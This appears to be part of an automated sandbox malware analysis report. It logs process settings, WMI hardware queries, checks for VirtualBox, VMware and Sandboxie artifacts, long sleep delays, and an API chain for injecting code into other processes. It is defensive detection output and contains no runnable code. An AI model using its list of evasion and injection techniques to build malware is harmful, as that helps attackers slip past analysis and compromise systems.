Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,41_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5296Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4458Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3723
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6917
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2087
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1854
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 401
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 356
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 370
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 360
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 358
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_38-245
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_20-17309
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.1 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 5296 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 4458 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312Thread sleep count: 3184 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312Thread sleep count: 3723 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376Thread sleep count: 5108 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376Thread sleep count: 1854 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 344Thread sleep count: 283 > 30
Source: C:\Windows\System32\dllhost.exe TID: 5688Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5804Thread sleep count: 401 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5804Thread sleep time: -40100s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1424Thread sleep count: 356 > 30
Source: C:\Windows\System32\lsass.exe TID: 1424Thread sleep time: -35600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2052Thread sleep count: 370 > 30
Source: C:\Windows\System32\svchost.exe TID: 2052Thread sleep time: -37000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 4812Thread sleep count: 178 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756Thread sleep count: 360 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756Thread sleep time: -36000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3308Thread sleep count: 358 > 30
Source: C:\Windows\System32\svchost.exe TID: 3308Thread sleep time: -35800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3300Thread sleep count: 294 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176Thread sleep count: 335 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176Thread sleep time: -33500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 896Thread sleep count: 330 > 30
Source: C:\Windows\System32\svchost.exe TID: 896Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3660Thread sleep count: 320 > 30
Source: C:\Windows\System32\svchost.exe TID: 3660Thread sleep time: -32000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2760Thread sleep count: 311 > 30
Source: C:\Windows\System32\svchost.exe TID: 2760Thread sleep time: -31100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7152Thread sleep count: 292 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1028Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 1028Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1780Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448Thread sleep count: 291 > 30
Source: C:\Windows\System32\svchost.exe TID: 2780Thread sleep count: 289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEED894 FindFirstFileExW,20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF1D894 FindFirstFileExW,20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D1D894 FindFirstFileExW,21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D54783D894 FindFirstFileExW,40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0922D894 FindFirstFileExW,41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0942D894 FindFirstFileExW,41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1ED894 FindFirstFileExW,42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D21D894 FindFirstFileExW,42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD5D894 FindFirstFileExW,43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B92D894 FindFirstFileExW,44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B95D894 FindFirstFileExW,44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_00000262F1CDDA18
